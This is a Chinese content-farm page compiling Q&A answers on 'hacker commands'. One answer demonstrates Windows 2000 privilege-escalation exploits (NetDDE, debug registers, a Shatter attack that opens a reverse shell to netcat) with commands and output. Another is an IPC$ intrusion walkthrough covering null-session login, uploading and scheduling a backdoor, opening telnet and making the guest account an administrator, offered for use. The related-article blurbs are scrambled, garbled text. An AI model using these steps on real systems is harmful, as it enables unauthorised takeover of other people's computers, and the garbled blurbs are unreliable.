当前位置:首页 > 生活知识 > 正文内容

黑客编程指令(黑客编程指令代码)

hacker2年前 (2022-08-12)生活知识106

本文目录一览:

DOS 下 或者CMD 的基本命令语言是什么?

简单些说,就是命令,你给计算机一个指令,它会按照指令去做。这就是指令(命令)

至于语言,本人无能为力了。SORRY

NetDDE Agent是什么东西?

NetDDE Agent",是一个"NDDEAgnt"类的window class,它的功能在于协助DDE Server程序及DDE Client程序之间的数据交换。由于它由Winlogon创建,这个Window的进程就以Local System的权限运行在登录用户的Desktop上,只不过用户看不到它而已。

"NetDDE Agent"还有另外一个辅助功能:当DDE Client试图连接到一个Trueted的DDE Share时,如果"NetDDE Agent"发现创建这个DDE Share的DDE Server尚未运行,它会主动启动这个Server。记住"NetDDE Agent"进程是具有Local System权限的,所以它启动Server没有一点问题。

根据DilDog的研究,这个隐藏式的"NetDDE Agent"就是一个缺口(Vulerability)!还记得Window操作系统中的函数SendMessage()吗?登录用户可以利用这个函数向Desktop上的任何Window发送Message,即使这个Window不属于当前登录用户。所以黑客在以一般用户的身份登录后,可以用SendMessage()发送一个WM_COPYDATA message给"NetDDE Agent",这个Message里面同时携带着一个精心炮制的数据块作为调用参数。这个数据块包含以下内容:

1。 一个Trusted DDE Share的名字,比如说Chat$;

2。 一个用于启动DDE Server的命令,如果"NetDDE Agent"发现创建Chat$的DDE

Server尚未运行,就根据这个命令来启动DDE Server。但是黑客可以任选一个命 令来伪造,比如说“Net Localgroup Administrators /Add 阿猫”----这里的阿 猫已经是合法的一般用户了;

3。 一些固定不变的字节。DilDog认为是这些字节应该是随机产生的,而不应该固定不变。我个人理解这些字节是用于向"NetDDE Agent"或Network DDE DSDM证明WM_COPYDATA message是由合法程序(而不是黑客程序)发出的,所以它们应该随机变化而不让黑客轻易得到。

当"NDDEAgnt"接收到WM_COPYDATA message时,它核对后会发现第三部分的字节正确无误,而且Trusted DDE Share确实存在,於是它就执行黑客命令,由于"NDDEAgnt"具有Local System权限,它可以顺利地让阿猫同志光荣地加入本地Administrator Group。

DilDog在文章中还附带了一个Exploit程序netddemsg,我接下来就在dallas上演示一下我自己是如何追随阿猫加入本地Administrators Group的:

/*

先以我的用户账号“moda”登录dallas。

看看本地administrators Group有哪些成员:

*/

D:\MyJob\securitylab\netddemsg\Debugnet localgroup administrators

Alias name administrators

Comment Administrators have complete and unrestricted access to the Members

-----------------------------------------------------------------------------

a_mao

Administrator

The command completed successfully.

/*

本地administrators Group目前只有两个成员,Administrator和a_mao。试着把“moda”加入到本地administrators Group中:

*/

D:\MyJob\securitylab\netddemsg\Debugnet localgroup administrators /add moda

System error 5 has occurred.

Access is denied.

/*

我的权限显然不够,所以得到error 5。

运行DilDog的Exploit程序,同时附带上我的黑客命令:

*/

D:\MyJob\securitylab\netddemsg\Debugnetddemsg -s Chat$

net localgroup administrators /add moda

/*

程序运行结束,让我们看看“moda”是否加入本地administrators Group:

*/

D:\MyJob\securitylab\netddemsg\Debug

D:\MyJob\securitylab\netddemsg\Debugnet localgroup

administrators

Alias name administrators

Comment Administrators have complete and unrestricted

access to the

Members

-----------------------------------------------------------------------------

a_mao

Administrator

moda

The command completed successfully.

D:\MyJob\securitylab\netddemsg\Debug

/*

我也光荣地加入了本地administrators Group

*/

利用Windows 2000/Intel中的Debug Register来提升权限:

我是在Georgi Guninski的个人网站)上看到这篇文章:

“Elevation of Privileges with debug registers on Win2k”,介绍如何利用Intel X86中的Debug Register来获取Local Administrator的权限。我的运气不太好,用文章中的Exploit程序Pipe3试了几次也不能成功,不过觉得利用Debug Register来攻击是个新的思路,所以就在这里顺便介绍一下。

Intel X86的Debug Register(DR0-DR7寄存器)是所有进程共用的。也就是说,你在一般用户进程中下一个绊子(就是设置一个断点),没准会把某个系统进程或者服务进程(Service)绊一跤;这一跤要是把系统/服务进程摔垮了,导致它停止执行的话,你没准就可以伪造该进程的Named Pipe;然后当有其它进程企图通过Named Pipe与垮掉的系统/服务进程联络时,黑客就可以利用函数ImpersonateNamedPipeClient来窃取其它进程的权限----这很可能就是Local SSystem的权限。

文章中的Exploit程序Pipe3(请从网下载)就是按照这个思路设计的:它要整垮的进程是lsass,所以必须先找几个lsass进程将要运行的指令的地址,以便在这些地址设置断点(也就是搞清楚lsass要走哪一条路,我们才好在那条路上设绊脚石);然后Pipe3以一般用户的权限运行程序Calc(计算器),并在其中设置断点,因为这断点的地址是在lsass运行的途径上,所以它们并不会影响Calc进程;过不了多久lsass就会有报告“SingleStep Exception”并让你选择是中断lsass运行还是Debug lsass进程;选择中断lsass以便关闭lsass拥有的Named Pipe----\ '5c.\pipe\lsass",这样Pipe3就可以伪造一个同名的Named Pipe;。。。。。。这以后的几步我想就不用重复了,大家都应该清楚。下面说说我Exploit的情况:

先用WinDbg找到lsass可能要运行的指令地址,lsass有多个Thread,我从不同Thread的ESP寄存器中找了几个地址。然后以我的一般用户名“moda”登录dallas。最后让Pipe3在这些地址分别设断点,总有那么一个地址会成功地中断lsass程,并且产生一个Warning对话框(Dialog Box)报告“SingleStep Exception”。当我选择中断进程后,lsass退出执行,Pipe3报告“LSA died!”:

D:\MyJob\securitylab\pipe3\Debugpipe3

Fun with debug registers. Written by Georgi Guninskivvdr started: lsasspid=240 breakp=5ffebc

LSA died!

Stop writing to pipe

start \\.\pipe\lsass

Failed to create named pipe:

\\.\pipe\lsass

由于lsass是重要的系统进程,它的终止运行将使系统在一分钟内自动Shutdown。另外我们注意到,\\.\pipe\lsass并没有成功地创建。为什么呢?我抢在系统Shutdown之前运行了一下Pipelist:

D:\MyJob\securitylab\pipe3\Debugpipelist

PipeList v1.01

by Mark Russinovich

Pipe Name Instances Max Instances

--------- --------- -------------

InitShutdown 2 -1

lsass 2 -1

ntsvcs 49 -1

scerpc 2 -1

net\NtControlPipe1 1 1

DhcpClient 1 -1

net\NtControlPipe2 1 1

。。。。。。。。。。。。。。。。

很奇怪,虽然lsass进程终止运行,但是它的Named PPipe还在----这大概是Pipe3没能创建“\\.\pipe\lsass”的原因。由于时间的关系,我没能深入研究这个问题,不过哪位朋友要是用Pipe3成功地实现Exploit的话,不要忘记告诉我一声!

不过话又说回来,这种利用Debug Register来终止lsass进程的方法----即使成功的话,也太暴露了:整个系统居然会Shutdown!任何一个傻瓜管理员都会发现有黑客入侵。这大概是黑客中的业余水平。好一点的黑客要做到“轻轻的我走了,正如我轻轻的来”,要象伟大的诗人兼武林高手徐自摩那样施展一把轻功,让傻瓜管理员根本发现不了,当然耳朵厉害的管理员还是会发现的----“谁?有黑客!抓黑客!”。水平达到最高境界的黑客应该是能够羚羊挂角、踏雪无痕的,这就不是我能评论的了。

利用Win32 API的设计缺陷提升权限:

几个星期以前我在计算机安全网站上看到两篇新发表的文章:、,作者是Chris

Paget(网名Foon),我建议大家去下面的网址读一下他的原著:

这两篇文章详细地介绍了如何利用Win32 API的一个设计缺陷来提升普通用户的权限。我们前面也提到,普通用户的进程可以向他/她的Desktop上任何Window发送Message,让目标Window执行用户指定的操作,比如说COPY/PASTE(拷贝/沾贴)、定时运算(Timer)等等。这个Window可能属于用户自己,也可能属于Local System(象"NetDDE Agent")----这样问题就来了:

---- 普通用户如你我他她它(比尔盖茨说狗也可能上网的,所以我们要算上“它”)在他的Desktop上先找到一个属于Local System的Window,我们给这个Window起一个名字叫WINDOWXYZ,这个WINDOWXYZ上最好有能接收沾贴内容的Control(比如说 EDIT);

---- 用户可以把黑客码用“WM_PASTE”(Message之一)沾贴到WINDOWXYZ的Control里;

---- 用户找到被沾贴的黑客码在WINDOWXYZ进程中的地址;

---- 用户然后发送“WM_TIMER”(Message之二)给WINDOWXYZ,同时把黑客码地址作为参数一并传给WINDOWXYZ,WINDOWXYZ於是执行定时运算,开始运行黑客码。这些 黑客码是以Local System的权限运行的,所以普通用户的权限被成功地提升。

---- 实际上,根据FOON的文章,即使普通用户在其Desktop上找不到属于Local System的Window,他也有办法提升权限:他可以利用Tool Help函数得到属于 Local System的进程及其Thread,只要其中任何一个Thread能处理Window的Message,用户就可以用函数PostThreadMessage()向这个属于Local System的Thread发送Message,然后就。。。如此这般。。。地提升权限。不过我没有时间 亲手试验过这种方法。

这两篇文章引起了很大的反响,其中最引人注意的是Microsoft的答复,Micorsoft说这种方法老早就有人提出来了,Nothing New!又说根本就不应该在普通用户的Desktop上创建属于Local System的Window,编程序的人应该避免这样的设计。但实际上隐藏式的窗口"NetDDE Agent"就出自于Microsoft的设计,它属于Local System但是却运行在登录用户的Desktop上,看来Microsoft是知法犯法啊!

我觉得这个缺陷就象不安全的函数strcpy一样,C语言在实现strcpy函数时有漏洞(函数返回地址、函数堆栈栈底地址等系统管理信息与缓冲区分配在一块,缓冲区的溢出就会覆盖系统管理信息),於是大家寄希望于程序员能够避免使用函数strcpy。现在Microsoft也承认在普通用户的Desktop上创建一个Window是危险的,所以它也寄希望于大家编程时避免使用这样的设计。

下面我专门编写了一个服务进程“SimpleService”来演示一下Microsoft的这个设计缺陷。SimpleService以Local System的权限运行,它打开一个Named Pipe然后等待Named Pipe Client与它联络;普通用户接着登录计算机并运行程序“Client”,“Client”是一个Named Pipe Client;它向SimpleService的Named Pipe随便写一些字节,於是SimpleService就在登录用户的Desktop上产生一个对话窗口(Dialog Box)。普通用户最后利用FOON的攻击程序Shatter攻击这个对话窗口来获得“Local System”的权限。

因为SimpleService程序太长,所以我只节选了关键的部分让大家参考:

====================SimpleService====================

#define SZAPPNAME _T("Simple")

#define SZSERVICENAME _T("SimpleService")

#define SZSERVICEDISPLAYNAME _T("Simple Service")

#define SZDEPENDENCIES _T("")

typedef struct DLGPARAM{

UINT numOfHit;

TCHAR *msg;

} DlgParam;

// internal function prototypes

static BOOL CALLBACK DialogProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);

// SimpleService.cpp : Defines the entry point for the

application.

//

HINSTANCE hAppInstance;

DlgParam m_dlgParam;

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR lpCmdLine,

int nCmdShow)

{

......

}

void WINAPI service_main()

{

......

}

VOID WINAPI service_ctrl(DWORD dwCtrlCode)

{

......

}

BOOL WINAPI ControlHandler ( DWORD dwCtrlType )

{

......

}

HANDLE hServerStopEvent = NULL;

VOID ServiceStart ()

{

......

......

hPipe = CreateNamedPipe(

lpszPipeName , // name of pipe

FILE_FLAG_OVERLAPPED

PIPE_ACCESS_DUPLEX, // pipe open mode

PIPE_TYPE_MESSAGE

PIPE_READMODE_MESSAGE

PIPE_WAIT, // pipe IO type

1, // number of instances

0, // size of outbuf

file://(0 == allocate as necessary)

0, // size of inbuf

1000, // default time-out value

sa); // security attributes

......

......

while ( 1 )

{

......

......

ConnectNamedPipe(hPipe, os);

......

......

bRet = ReadFile(

hPipe, // file to read from

szIn, // address of input buffer

sizeof(szIn), // number of bytes to read

cbRead, // number of bytes read

os); // overlapped stuff, not needed

......

......

_stprintf(szOut, _T("Please check the Dialog Box"));

_stprintf(szOut1, _T("Eacho Back! [%s]"), szIn);

......

......

bRet = WriteFile(

hPipe, // file to write to

szOut, // address of output buffer

sizeof(szOut), // number of bytes to write

cbWritten, // number of bytes written

os); // overlapped stuff, not needed

......

......

DisconnectNamedPipe(hPipe);

m_dlgParam.numOfHit++;

m_dlgParam.msg = szOut1;

/*

在登录用户的Desktop上创建一个窗口

*/

int result = DialogBoxParam(hAppInstance,

MAKEINTRESOURCE(IDD_SVCMSG),

NULL,

(DLGPROC) DialogProc,

(LPARAM) m_dlgParam);

}

cleanup:

......

......

}

VOID ServiceStop()

{

if ( hServerStopEvent )

SetEvent(hServerStopEvent);

}

#define SIZEOFBUF 40

/*

Window的Message Handler

*/

BOOL CALLBACK DialogProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)

{

DlgParam* l_pDlgParam = (DlgParam*) lParam;

CHAR tempBuf[SIZEOFBUF];

switch (uMsg)

{

case WM_INITDIALOG:

{

HWND hNumVisit = GetDlgItem(hwnd, IDC_NUMHIT); /*限定Edit Control的尺寸(Size)为3*/

SendMessage( hNumVisit, EM_LIMITTEXT, (WPARAM) 3,

(LPARAM)0);

_itoa(l_pDlgParam-numOfHit, tempBuf,10);

SendMessage(hNumVisit, WM_SETTEXT, (WPARAM)

0,(LPARAM)tempBuf);

HWND hMsg = GetDlgItem(hwnd, IDC_MSG);

/*限定Edit Control的尺寸(Size)为40*/

SendMessage( hMsg, EM_LIMITTEXT, (WPARAM) SIZEOFBUF,

(LPARAM)0);

SendMessage( hMsg, WM_SETTEXT, (WPARAM) 0,

(LPARAM) l_pDlgParam-msg );

SetForegroundWindow(hwnd);

return FALSE;

}

case WM_COMMAND:

{

switch (LOWORD(wParam))

{

case IDC_OK:

EndDialog(hwnd, IDC_OK);

return FALSE;

default:

return FALSE;

}

}

}

return FALSE;

}

===============================================

下面是程序Client.c,非常简单,它的功能仅仅是向“\\.\pipe\simple”发送几个字节:

=======================Client========================

// client.cpp : Defines the entry point for the console

application.

//

#include

#include

#include

#include

int main(int argc, char* argv[])

{

char inbuf[80];

char outbuf[80];

DWORD bytesRead;

BOOL ret;

LPSTR lpszPipeName = "\\\\.\\pipe\\simple";

LPSTR lpszString = "World";

strcpy( outbuf, lpszString );

ret = CallNamedPipeA(lpszPipeName,

outbuf, sizeof(outbuf),

inbuf, sizeof(inbuf),

bytesRead, NMPWAIT_WAIT_FOREVER);

if (!ret) {

printf("client: CallNamedPipe failed for %d\n",

GetLastError());

exit(1);

}

printf("client: received: %s\n", inbuf);

return 0;

}

==================================================

FOON编写了一个攻击工具Shatter,大家可以参考他的文章来使用这个工具,而且他的网站上还有Shatter的源程序。这个程序专门攻击象SimpleService这样会创建Window的服务进程,它首先把Window中Edit Control的尺寸(Size)扩大,然后把可执行的黑客码沾贴到Edit中,这样就把黑客码拷贝到这个Window进程的内存中了----很Cool吧!接下来我们就要寻找黑客码在内存中的地址,FOON是用Windbg去寻找这个地址的,详情请参考他的文章。最后Shatter向Window进程发送一个定时执行Message----“WM_TIMER”,迫使Window进程执行刚才拷贝进去的黑客码。这个黑客码是根据jill的黑客码改编而成,它产生一个远程的cmd shell联结回到Client机器上,所以我们可以用鼎鼎有名的netcat程序与它联络。

我现在来演示一下使用Shatter攻击SimpleService的过程,看看普通用户“moda”是如何通过Shatter提升权限的:

先以普通用户“moda”登录,看看本地Administrators组当前的成员:

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.

D:\MyJob\tool\netcatnet localgroup administrators

Alias name administrators

Comment Administrators have complete and unrestricted access to the Members

-----------------------------------------------------------------------------

Administrator

The command completed successfully.

本地Administrators组只有Administrator一个成员。我们试一下能不能把“moda”加入到本地Administrators组。

D:\MyJob\tool\netcatnet localgroup administrators /add moda

System error 5 has occurred.

Access is denied.

很惨呀,得了一个“Access is denied.”的错误。

下面运行程序Client,向SimpleService发送几个字节,於是SimpleService在普通用户“moda”的Desktop上产生一个对话框:

这个对话框上有两个Edit Controls,一个对应着“Number Of Hit”,这里输出SimpleService的Named Pipe被访问的次数;一个对应着“Message Back”,这里输出SimpleService的Message。这两个Edit都可以被攻击利用,不过我这里以“Message Back”的Edit为例。让我们运行FOON的攻击程序Shatter:

第一步:我们需要扩大Edit的尺寸(Size)。大家从SimpleService的源程序中可以看到,“Message Back”的Edit只允许40个char,而jill的黑客码显然超过了这个长度,所以我们就通过Shatter向这个Edit的柄Handler发送EM_SETLIMITEXT,把它的尺寸扩大到0xffffffff(见下图)。

第二步:把FOON改编的jill黑客码拷贝到Clipboard上,然后往Edit发送WM_PASTE,你可以看到Edit中马上堆积了一长串乱七八糟的字符,这就是jill黑客码。

第三步:利用Windbg去寻找jill黑客码在Window内存中的地址,这个过程FOON已经讲得很清楚了,所以就不用我罗嗦了。在dallas上我得到的地址是在0x1389c0附近。

第四步:另外打开一个Dos窗口运行netcat,我们准备与打入敌营的侦察兵jill联络:

D:\MyJob\tool\netcat

D:\MyJob\tool\netcatnc -lp 123

第五步:向Edit发送WM_TIMER,让Window进程跳去执行从0x1389c0开始的黑客码。你马上就能看到netcat开始收到了jill发回来的内容,它输出一些版权信息。

D:\MyJob\tool\netcat

D:\MyJob\tool\netcatnc -lp 123

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.

第六步: 现在你就可以通过netcat与Window进程中的cmd Shell联系,可以向它发送命令,从它那里得到命令运行结果。这个cmd Shell具有Local System的权限,所以我们可以轻易地把普通用户“moda”加入到本地Administrators组中:

D:\WINNT\system32net localgroup administrators /add moda

net localgroup administrators /add moda

The command completed successfully.

D:\WINNT\system32net localgroup administrators

net localgroup administrators

Alias name administrators

Comment Administrators have complete and unrestricted access to the Members

-----------------------------------------------------------------------------

Administrator moda

The command completed successfully.

D:\WINNT\system32

D:\WINNT\system32

以上就是我演示Microsoft这个缺陷的过程,虽说我有意把SimpleServic设计得易于黑客攻击,但实际上还有不少的流行的程序也是犯了同样的错误,象FOON文章中提及的Network Associates VirusScan v4.5.1, 还有我最喜欢用的WinVNC等等,它们都在普通用户的Desktop上创建了一个具有Local System权限的Window。

编程 DOS命令 黑客

nc.exe是一个程序,系统不自带,需要下载。你百度搜索一下,下载后把nc.exe防在系统文件夹(C:\Windows\System32)里就可以用了。

黑客们在编写扰乱社会和他人的计算机程序,这些代码统称为什么

黑客们在编写的计算机程序代码统称为恶意代码。

恶意代码

定义一:恶意代码又称恶意软件。这些软件也可称为广告软件(adware)、间谍软件(spyware)、恶意共享软件(malicious shareware)。是指在未明确提示用户或未经用户许可的情况下,在用户计算机或其他终端上安装运行,侵犯用户合法权益的软件。与病毒或蠕虫不同,这些软件很多不是小团体或者个人秘密地编写和散播,反而有很多知名企业和团体涉嫌此类软件。有时也称作流氓软件。

定义二:恶意代码是指故意编制或设置的、对网络或系统会产生威胁或潜在威胁的计算机代码。最常见的恶意代码有计算机病毒(简称病毒)、特洛伊木马(简称木马)、计算机蠕虫(简称蠕虫)、后门、逻辑炸弹等。

英文:malicious software 或 malevolent software,Malicious code,malevolent code 或者简称Malware。

参考资料

百度文库:

跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤:

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功,连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;

下面纯手打,上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

扫描二维码推送至手机访问。

版权声明:本文由万物知识分享发布,如需转载请注明出处。

本文链接:http://qmsspa.com/82029.html

分享给朋友:

“黑客编程指令(黑客编程指令代码)” 的相关文章

百度建立新连接,跑通新商业模式

百度建立新连接,跑通新商业模式

 二0 一 九年是小法式 的一年。 本年 , 对于小法式 的量信晚未集来,止业实邪迎去了发作 战收成 。详细 表示 正在二个圆里。一是腾讯QQ、美团等互联网巨子 成为新入进者;第两,跟着 baidu等现有玩野的赓续 添码,小法式 成为用户猎取疑息战办事 的新进口 。 数据隐示,今朝 bai...

(基础教程)制作申请广告联盟的英文网站

申请告白 同盟 ,必需 要要一个英文网站。 若何 得到 一个英文网站:  一,扒站: 扒站,便是把 别人的站彻底复造高去,修正 。 经由过程 谷歌或者者bing等外洋 经常使用搜刮 引擎搜刮 相闭症结 词去猎取目的 网站。 经常使用的搜刮 词有:health,diet, spa, cancer,au...

vps使用- vultr购买和使用和vps的连接

作孬的网站要搁正在网上,年夜 野否以抉择虚构主机也能够抉择vps,尔正常风俗 用vps, 那面推举 一个没有错的vps  vultr vultr按小时计费,有余一小时按一小时算。办事 烧毁 (Destroy)即停滞 计费,用多少空儿支若干 用度 。今朝 最低否用套餐为 五美圆/月,即$0.00 七/...

你必须知道的YouTube视频优化技巧

正在google的SEO算法外面,咱们否以看到youtube占领了一个异常 主要 的地位 ,google 对于Youtube的望频赐与 了一个异常 下的权重。曲不雅 的咱们否以从平凡 搜刮 症结 字的时刻 ,下权重的Youtube望频常常 是排正在搜刮 的第一名。 鉴于如下几点的熟悉 , 第一, ...

seo是什么意思他到底有什么用处(seo的作用和意义是什么)

seo是什么意思他到底有什么用处(seo的作用和意义是什么)

许多 新脚搜索引擎优化 方才 打仗 搜索引擎优化 ,对付 搜索引擎优化 是甚么意义?感化 是甚么?没有是很相识 ,昨天火源智库小编便为年夜 野具体 先容 一高。 搜索引擎优化 是甚么意义?搜索引擎优化 英文齐称为“Search Eng...

福州给网站优化方案(深圳个人如何做网站优化平台)

福州给网站优化方案(深圳个人如何做网站优化平台)

跟着 baidu的赓续 整合,现在 的网站劣化愈来愈易,正在祸州,不论是网站的支录质照样 排名的晋升 ,皆让许多 工资 之头痛。昨天火源智库小编便为年夜 野先容 一高祸州网站劣化怎么作?愿望  对于年夜 野有赞助 。 1、新网站要作孬...

评论列表

痴者未芩
2年前 (2022-08-12)

==================== // client.cpp : Defines the entry point for the console application. // #include #

澄萌离祭
2年前 (2022-08-12)

32 API的一个设计缺陷来提升普通用户的权限。我们前面也提到,普通用户的进程可以向他/她的Desktop上任何Window发送Message,让目标Window执行用户指定的操作,比如说COPY/PASTE(拷贝/沾贴)、定时运算

鸠骨池虞
2年前 (2022-08-12)

上有两个Edit Controls,一个对应着“Number Of Hit”,这里输出SimpleService的Named Pipe被访问的次数;一个对应着“Message Back”,这里输出

余安吝吻
2年前 (2022-08-12)

Administrators have complete and unrestricted access to the Members ----------------------------------------------------------------------------

慵吋路弥
2年前 (2022-08-12)

节选了关键的部分让大家参考: ====================SimpleService==================== #define SZAPPNAME _T("Simple") #define SZSER

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。